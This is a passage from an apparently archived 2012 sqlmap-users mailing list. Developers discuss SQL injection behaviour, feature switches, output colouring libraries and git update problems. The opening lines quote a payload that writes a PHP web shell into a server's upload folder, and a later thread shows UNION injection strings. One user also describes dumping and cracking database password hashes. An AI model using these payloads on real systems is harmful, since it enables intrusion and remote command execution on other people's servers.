>> ' UNION ALL SELECT "<?php system($_GET['cmd']); ?>",NULL,NULL,NULL INTO
>> OUTFILE "/opt/lampp/htdocs/uploads/test.php"#
>>
>> and here's sqlmap payload:
>> -7440' OR 6498=6498 LIMIT 1 INTO OUTFILE 's/scope/sqli/tmpuywdg.php' LINES
>> TERMINATED BY
>> ...
>
> The reason why we opted to upload the web file stager with "LIMIT 1
> INTO OUTFILE" rather than using "UNION ALL SELECT" is because with the
> former we do not have to rely on UNION SQL injection technique which
> is statistically less common than boolean/time-based techniques.
>
> In cases where the boolean-based injection is OR-based though, the
> "LIMIT 1" clause limits the output to one entry only which will output
> to the file only the first entry of the whole SELECT statement. Hence
> no sqlmap payload is written to the target PHP file. This is exactly
> the behaviour that you have experienced.
>
> A solution to this issue is to use the "LIMIT [...]" clause payload
> for file upload as is by default unless it is an OR-based
> boolean-based SQL injection, in which case a fall-back to UNION
> statement is required, when UNION SQL injection technique has been
> identified too.
>
> We will be addressing this issue shortly.
>
> Bernardo
>
>
>
> --
> Bernardo Damele A. G.
>
> Homepage: http://about.me/inquis
> E-mail / Jabber: bernardo.damele (at) gmail.com
> Mobile: +447788962949 (UK 07788962949)



-- 
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)

Re: [sqlmap-users] Getting Database IP Address (Oracle)

[Bernardo D. A. G. <ber...@gm...>]

Zaki,

Recently we added switch --hostname to retrieve the database server
hostname. There's no built-in switch to retrieve the IP yet.

Bernardo


On 11 July 2012 08:12, Zaki Akhmad <zak...@gm...> wrote:
> Hello list,
>
> I am using sqlmap exploiting SQL injection vulnerabilities. By using
> sqlmap, I could fingerprint the database server is using Oracle. Then
> I dumped the username with its password, then cracked the hashes.
>
> Now how do I get this Oracle database server IP address? Since from
> sqlmap the manual, OS command injection is only for MS-SQL,
> PostgreSQL, and MySQL database.
>
> Regards,
> --
> Zaki Akhmad
>
> ------------------------------------------------------------------------------
> Live Security Virtual Conference
> Exclusive live event will cover all the ways today's security and
> threat landscape has changed and how IT managers can respond. Discussions
> will include endpoint security, mobile security and the latest in malware
> threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users



-- 
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)

Re: [sqlmap-users] It seems that "+" is not allowed on server

[Miroslav S. <mir...@gm...>]

Hi.

We must use concatenation in UNION injections either by '+' sign or by
concat function (string unescaping and prepending/appending result
boundaries). Now, in function approach sign ',' could be a problem for some
other case, so that's not a solution for sure.

Either way, we would suggest you to use a manual approach. Optimal solution
with least headache.

Kind regards,
Miroslav Stampar
On Jul 15, 2012 11:48 AM, <du...@al...> wrote:

> I noticed that sqlmap is using '+' signs when doing union injection,
> and I can't seem to stop it from doing that (maybe there's a tamper
> script I missed?).
>
> So I have a scenario, where + is not allowed on the server.
>
>
> Thus the following payload works
>
> -579 UNION ALL SELECT 1 --
>
> While this one wont
>
> -579 UNION ALL SELECT
>
> CHAR(58)+CHAR(110)+CHAR(104)+CHAR(113)+CHAR(58)+CHAR(111)+CHAR(118)+CHAR(107)+CHAR(99)+CHAR(77)+CHAR(73)+CHAR(82)+CHAR(122)+CHAR(100)+CHAR(76)+CHAR(58)+CHAR(120)+CHAR(98)+CHAR(101)+CHAR(58)--
>
>
> Suggestions on how I could solve such a situation? :-)
>
>
> ------------------------------------------------------------------------------
> Live Security Virtual Conference
> Exclusive live event will cover all the ways today's security and
> threat landscape has changed and how IT managers can respond. Discussions
> will include endpoint security, mobile security and the latest in malware
> threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>

[sqlmap-users] It seems that "+" is not allowed on server

[<du...@al...>]

I noticed that sqlmap is using '+' signs when doing union injection, 
and I can't seem to stop it from doing that (maybe there's a tamper 
script I missed?).

So I have a scenario, where + is not allowed on the server.


Thus the following payload works

-579 UNION ALL SELECT 1 --

While this one wont

-579 UNION ALL SELECT 
CHAR(58)+CHAR(110)+CHAR(104)+CHAR(113)+CHAR(58)+CHAR(111)+CHAR(118)+CHAR(107)+CHAR(99)+CHAR(77)+CHAR(73)+CHAR(82)+CHAR(122)+CHAR(100)+CHAR(76)+CHAR(58)+CHAR(120)+CHAR(98)+CHAR(101)+CHAR(58)--


Suggestions on how I could solve such a situation? :-)

Re: [sqlmap-users] no subject

[Bernardo D. A. G. <ber...@gm...>]

Use switch --sql-query.

Bernardo


On 14 July 2012 14:01, Dave U. Random
<ano...@an...> wrote:
> hi there,
> I was trying to dump a table and was wondering if there is an easy way to tell the map just to dump the rows where one column, eg. active=1. Haven't found anything in the doc's, hope it's not a totally stupid question :)
> thx,keep up the good work
>
> ------------------------------------------------------------------------------
> Live Security Virtual Conference
> Exclusive live event will cover all the ways today's security and
> threat landscape has changed and how IT managers can respond. Discussions
> will include endpoint security, mobile security and the latest in malware
> threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users



-- 
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)

[sqlmap-users] no subject

[Dave U. R. <ano...@an...>]

hi there,
I was trying to dump a table and was wondering if there is an easy way to tell the map just to dump the rows where one column, eg. active=1. Haven't found anything in the doc's, hope it's not a totally stupid question :)
thx,keep up the good work

Re: [sqlmap-users] Output colouring

[Bernardo D. A. G. <ber...@gm...>]

They're all third party libs, not part of vanilla Python installation.

Bernardo


On 13 July 2012 13:15, Andres Riancho <and...@gm...> wrote:
> w0w, those are too many libraries, I wasn't expecting this. Are those
> libraries included in all/most linux platforms? Do you guys care about
> that? :)
>
> On Thu, Jul 12, 2012 at 10:11 AM, Bernardo Damele
> <ber...@gm...> wrote:
>> Hi Andres,
>>
>> We use ansistrm library to wrap the stream output builtin logging
>> library method.
>>
>> We use termcolor library to colourize the print/sys.stdout() calls and
>> use colorama library to wrap termcolor and make it cross-platform.
>>
>> This was the cleanest and most reliable solution that I have
>> identified following some testing of other libraries too.
>>
>> Hope this helps.
>>
>> Bernardo Damele A. G.
>>
>> This message was sent from a smartphone
>>
>> On 12 Jul 2012, at 13:33, Andres Riancho <and...@gm...> wrote:
>>
>>> Bernardo,
>>>
>>> On Wed, Jul 11, 2012 at 10:18 PM, Bernardo Damele A. G.
>>> <ber...@gm...> wrote:
>>>> Hi,
>>>>
>>>> We have recently implemented colouring of the standard output. It
>>>> should work across all three main operating systems: Linux (tested on
>>>> Ubuntu with bash and zsh), Windows (tested on Windows 7) and Mac OSX
>>>> (tested on Lion with bash and zsh).
>>>
>>> I was thinking about implementing something similar for w3af, which
>>> library did you guys use to have cross-platform support for coloring?
>>>
>>>> See a screenshot here,
>>>> https://twitter.com/sqlmap/status/223175873614987264.
>>>>
>>>> Please, report any bugs you might encounter.
>>>>
>>>> Thank you,
>>>> Bernardo
>>>>
>>>>
>>>> --
>>>> Bernardo Damele A. G.
>>>>
>>>> E-mail / Jabber: bernardo.damele (at) gmail.com
>>>> Mobile: +447788962949 (UK 07788962949)
>>>>
>>>> ------------------------------------------------------------------------------
>>>> Live Security Virtual Conference
>>>> Exclusive live event will cover all the ways today's security and
>>>> threat landscape has changed and how IT managers can respond. Discussions
>>>> will include endpoint security, mobile security and the latest in malware
>>>> threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
>>>> _______________________________________________
>>>> sqlmap-users mailing list
>>>> sql...@li...
>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>
>>>
>>>
>>> --
>>> Andrés Riancho
>>> Project Leader at w3af - http://w3af.org/
>>> Web Application Attack and Audit Framework
>>> Twitter: @w3af
>>> GPG: 0x93C344F3
>
>
>
> --
> Andrés Riancho
> Project Leader at w3af - http://w3af.org/
> Web Application Attack and Audit Framework
> Twitter: @w3af
> GPG: 0x93C344F3



-- 
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)

Re: [sqlmap-users] error in update

[Brandon P. <bpe...@gm...>]

You may just rm -rf sqlmap and reclone. :-\
On Jul 13, 2012 11:32 AM, "Iago Sousa" <146...@gm...> wrote:

> Git shows the same error.
>
> On Fri, Jul 13, 2012 at 3:24 PM, Brandon Perry <bpe...@gm...>wrote:
>
>> Now run git pull
>> On Jul 13, 2012 11:23 AM, "Iago Sousa" <146...@gm...> wrote:
>>
>>> I think my git is crazy.
>>>
>>> root@bt:/pentest/database/sqlmap# git reset --hard HEAD
>>> HEAD is now at 25eca9d finally got this working on MSSQL 2005: commands
>>> can now be executed as another user (BULK INSERT must be used in such case,
>>> see comments in the code) - issue #34
>>>
>>> On Fri, Jul 13, 2012 at 3:16 PM, Brandon Perry <
>>> bpe...@gm...> wrote:
>>>
>>>> If you haven't made any changes to the source, you can git reset --hard
>>>> HEAD
>>>> On Jul 13, 2012 11:12 AM, "Iago Sousa" <146...@gm...> wrote:
>>>>
>>>>> Yes, "Already on 'master'" show me when I put -f.
>>>>>
>>>>> On Fri, Jul 13, 2012 at 3:00 PM, Miroslav Stampar <
>>>>> mir...@gm...> wrote:
>>>>>
>>>>>> But have you tried with -f?
>>>>>> On Jul 13, 2012 7:51 PM, "Iago Sousa" <146...@gm...> wrote:
>>>>>>
>>>>>>> Already on 'master'
>>>>>>> Your branch is behind 'origin/master' by 79 commits, and can be
>>>>>>> fast-forwarded.
>>>>>>>
>>>>>>> On Fri, Jul 13, 2012 at 2:47 PM, Miroslav Stampar <
>>>>>>> mir...@gm...> wrote:
>>>>>>>
>>>>>>>> Hi Iago.
>>>>>>>>
>>>>>>>> Try with:
>>>>>>>> git checkout -f master
>>>>>>>>
>>>>>>>> Kind regards,
>>>>>>>> Miroslav Stampar
>>>>>>>>
>>>>>>>> On Fri, Jul 13, 2012 at 7:43 PM, Iago Sousa <146...@gm...>wrote:
>>>>>>>>
>>>>>>>>> I receive that error when I try to update with 'git pull'.
>>>>>>>>>
>>>>>>>>> error: Untracked working tree file 'extra/ansistrm/__init__.py'
>>>>>>>>> would be overwritten by merge.  Aborting
>>>>>>>>>
>>>>>>>>>
>>>>>>>>> ------------------------------------------------------------------------------
>>>>>>>>> Live Security Virtual Conference
>>>>>>>>> Exclusive live event will cover all the ways today's security and
>>>>>>>>> threat landscape has changed and how IT managers can respond.
>>>>>>>>> Discussions
>>>>>>>>> will include endpoint security, mobile security and the latest in
>>>>>>>>> malware
>>>>>>>>> threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
>>>>>>>>> _______________________________________________
>>>>>>>>> sqlmap-users mailing list
>>>>>>>>> sql...@li...
>>>>>>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>>>>>>>
>>>>>>>>>
>>>>>>>>
>>>>>>>>
>>>>>>>> --
>>>>>>>> Miroslav Stampar
>>>>>>>> http://about.me/stamparm
>>>>>>>>
>>>>>>>
>>>>>>>
>>>>>>>
>>>>>>> --
>>>>>>>
>>>>>>>           Regards, Iago Sousa
>>>>>>>   Webdesigner at Radar Topografia
>>>>>>> Programmer and Security Researcher
>>>>>>>
>>>>>>>
>>>>>
>>>>>
>>>>> --
>>>>>
>>>>>           Regards, Iago Sousa
>>>>>   Webdesigner at Radar Topografia
>>>>> Programmer and Security Researcher
>>>>>
>>>>>
>>>>>
>>>>> ------------------------------------------------------------------------------
>>>>> Live Security Virtual Conference
>>>>> Exclusive live event will cover all the ways today's security and
>>>>> threat landscape has changed and how IT managers can respond.
>>>>> Discussions
>>>>> will include endpoint security, mobile security and the latest in
>>>>> malware
>>>>> threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
>>>>> _______________________________________________
>>>>> sqlmap-users mailing list
>>>>> sql...@li...
>>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>>>
>>>>>
>>>
>>>
>>> --
>>>
>>>           Regards, Iago Sousa
>>>   Webdesigner at Radar Topografia
>>> Programmer and Security Researcher
>>>
>>>
>
>
> --
>
>           Regards, Iago Sousa
>   Webdesigner at Radar Topografia
> Programmer and Security Researcher
>
>

Re: [sqlmap-users] error in update

[Iago S. <146...@gm...>]

Git shows the same error.

On Fri, Jul 13, 2012 at 3:24 PM, Brandon Perry <bpe...@gm...>wrote:

> Now run git pull
> On Jul 13, 2012 11:23 AM, "Iago Sousa" <146...@gm...> wrote:
>
>> I think my git is crazy.
>>
>> root@bt:/pentest/database/sqlmap# git reset --hard HEAD
>> HEAD is now at 25eca9d finally got this working on MSSQL 2005: commands
>> can now be executed as another user (BULK INSERT must be used in such case,
>> see comments in the code) - issue #34
>>
>> On Fri, Jul 13, 2012 at 3:16 PM, Brandon Perry <bpe...@gm...
>> > wrote:
>>
>>> If you haven't made any changes to the source, you can git reset --hard
>>> HEAD
>>> On Jul 13, 2012 11:12 AM, "Iago Sousa" <146...@gm...> wrote:
>>>
>>>> Yes, "Already on 'master'" show me when I put -f.
>>>>
>>>> On Fri, Jul 13, 2012 at 3:00 PM, Miroslav Stampar <
>>>> mir...@gm...> wrote:
>>>>
>>>>> But have you tried with -f?
>>>>> On Jul 13, 2012 7:51 PM, "Iago Sousa" <146...@gm...> wrote:
>>>>>
>>>>>> Already on 'master'
>>>>>> Your branch is behind 'origin/master' by 79 commits, and can be
>>>>>> fast-forwarded.
>>>>>>
>>>>>> On Fri, Jul 13, 2012 at 2:47 PM, Miroslav Stampar <
>>>>>> mir...@gm...> wrote:
>>>>>>
>>>>>>> Hi Iago.
>>>>>>>
>>>>>>> Try with:
>>>>>>> git checkout -f master
>>>>>>>
>>>>>>> Kind regards,
>>>>>>> Miroslav Stampar
>>>>>>>
>>>>>>> On Fri, Jul 13, 2012 at 7:43 PM, Iago Sousa <146...@gm...>wrote:
>>>>>>>
>>>>>>>> I receive that error when I try to update with 'git pull'.
>>>>>>>>
>>>>>>>> error: Untracked working tree file 'extra/ansistrm/__init__.py'
>>>>>>>> would be overwritten by merge.  Aborting
>>>>>>>>
>>>>>>>>
>>>>>>>> ------------------------------------------------------------------------------
>>>>>>>> Live Security Virtual Conference
>>>>>>>> Exclusive live event will cover all the ways today's security and
>>>>>>>> threat landscape has changed and how IT managers can respond.
>>>>>>>> Discussions
>>>>>>>> will include endpoint security, mobile security and the latest in
>>>>>>>> malware
>>>>>>>> threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
>>>>>>>> _______________________________________________
>>>>>>>> sqlmap-users mailing list
>>>>>>>> sql...@li...
>>>>>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>>>>>>
>>>>>>>>
>>>>>>>
>>>>>>>
>>>>>>> --
>>>>>>> Miroslav Stampar
>>>>>>> http://about.me/stamparm
>>>>>>>
>>>>>>
>>>>>>
>>>>>>
>>>>>> --
>>>>>>
>>>>>>           Regards, Iago Sousa
>>>>>>   Webdesigner at Radar Topografia
>>>>>> Programmer and Security Researcher
>>>>>>
>>>>>>
>>>>
>>>>
>>>> --
>>>>
>>>>           Regards, Iago Sousa
>>>>   Webdesigner at Radar Topografia
>>>> Programmer and Security Researcher
>>>>
>>>>
>>>>
>>>> ------------------------------------------------------------------------------
>>>> Live Security Virtual Conference
>>>> Exclusive live event will cover all the ways today's security and
>>>> threat landscape has changed and how IT managers can respond.
>>>> Discussions
>>>> will include endpoint security, mobile security and the latest in
>>>> malware
>>>> threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
>>>> _______________________________________________
>>>> sqlmap-users mailing list
>>>> sql...@li...
>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>>
>>>>
>>
>>
>> --
>>
>>           Regards, Iago Sousa
>>   Webdesigner at Radar Topografia
>> Programmer and Security Researcher
>>
>>


-- 

          Regards, Iago Sousa
  Webdesigner at Radar Topografia
Programmer and Security Researcher